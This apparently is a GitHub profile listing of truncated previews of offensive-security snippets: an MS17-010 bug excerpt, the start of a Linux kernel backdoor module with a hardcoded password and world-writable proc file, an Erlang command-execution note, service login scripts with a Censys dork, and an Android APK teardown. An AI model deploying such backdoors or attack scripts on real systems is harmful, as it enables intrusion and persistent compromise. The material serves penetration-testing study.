nixawk
nixawk
Nice Job From: https://github.com/worawit/MS17-010/blob/master/BUG.txt ``` =============== SMB Transaction =============== To understand the bugs, we need to understand SMB transaction because most bugs in MS17-010 are related to transation. I try...
``` 01:24 $ ipy Python 3.6.4 (v3.6.4:d48ecebad5, Dec 18 2017, 21:07:28) Type 'copyright', 'credits' or 'license' for more information IPython 6.2.1 -- An enhanced Interactive Python. Type '?' for help....
## add a backdoor driver into kernel-source You can try to use other methods to backdoor the linux. (not driver) ``` ~/Projects/kernelbuild/linux-5.0.3 ➭ zcat /proc/config.gz > .config ~/Projects/kernelbuild/linux-5.0.3 ➭ ll...
## Setup an env lab ``` $ sudo apt-get install rabbitmq-server $ sudo service rabbitmq-server start $ sudo rabbitmqctl -q cluster_status ``` ## Elang executes os command os:cmd runs command...
``` #include #include #include #include #include MODULE_LICENSE("GPL"); MODULE_AUTHOR("security"); MODULE_DESCRIPTION("Just for educational purpose"); #define KERN_PERMBITS 0666 // permission bits -> /proc/mod/bdm #define KERN_PROCROOT "mod" #define KERN_PROCFILE "bdm" #define KERN_PASSWORD "password" static...
``` #!/usr/bin/python # -*- coding: utf-8 -*- # $ pip install --user python-ldap import ldap import ldapurl import logging import getpass logging.basicConfig(level=logging.INFO) log = logging.getLogger(__file__) def ldap_login(username, password, host, port=389,...
``` #!/usr/bin/python # -*- coding: utf-8 -*- # Keywords : EdgeMax, EdgeOS # Censys dork : "CN=UBNT Router UI" import requests import logging requests.packages.urllib3.disable_warnings( requests.packages.urllib3.exceptions.InsecureRequestWarning ) logging.basicConfig(level=logging.DEBUG) log = logging.getLogger(__file__)...
``` #!/usr/bin/python # -*- coding: utf-8 -*- # pip2 install --user splunk-sdk import splunklib.binding as binding import logging logging.basicConfig(level=logging.INFO) log = logging.getLogger(__file__) def splunk_login(host, port, username, password): """Login Splunk based...
Download: [**Windows Kernel Exploitation.pdf**](https://github.com/nixawk/pentest-wiki/files/1666475/Windows.Kernel.Exploitation.pdf). If you like, please add a reference url for [pentest-wiki](https://github.com/nixawk/pentest-wiki/). ## References - https://github.com/nixawk/Awesome-Windows-Debug/issues/3 - https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
Tested on **ONEPLUS A3010** ``` $ adb shell getprop ro.build.version.release 7.0 $ adb shell pm list packages -f $ adb pull /system/app/EngineeringMode/ EngineeringMode.apk $ cd EngineeringMode.apk $ apktool -d EngineeringMode.apk...